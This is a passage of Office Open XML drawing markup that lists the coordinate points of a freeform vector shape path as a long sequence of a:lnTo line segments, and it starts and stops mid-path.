                      <a:pt x="1321" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1319" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1316" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1310" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1303" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1296" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1289" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1282" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1276" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1272" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1273" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1275" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1278" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1280" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1287" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1298" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1312" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1328" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1359" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1370" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1372" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1360" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1352" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1343" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1334" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1326" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1319" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1319" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1320" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1324" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1327" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1335" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1385" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1389" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1401" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1404" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1405" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1401" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1389" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1382" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1382" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1385" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1390" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1398" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1409" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1419" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1440" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1447" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1451" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1460" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1473" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1472" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1461" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1453" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1445" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1428" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1424" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1422" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1420" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1420" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1422" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1423" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1426" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1433" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1443" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1464" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1474" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1481" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1489" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1491" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1472" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1466" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1462" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1461" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1470" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1477" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1487" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1496" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1507" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1522" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1524" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1508" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1488" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1484" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1484" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1486" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1491" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1527" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1510" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1502" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1496" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1492" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1476" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1445" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1431" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1428" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1448" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1461" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1474" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1487" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1508" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1486" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1477" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1470" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1463" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1466" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1473" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1481" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1480" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1477" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1471" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1464" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1446" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1433" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1418" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1404" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1392" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1381" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1369" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1340" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1304" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1287" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1274" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1266" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1257" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1240" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1192" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1168" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1147" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1131" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1124" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1101" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1054" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1029" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1007" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="991" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="984" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="979" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="968" y="466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="952" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="933" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="915" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="887" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="858" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="843" y="533"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="827" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="784" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="780" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="744" y="591"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="713" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="527" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="302"/>
                    </a:lnTo>
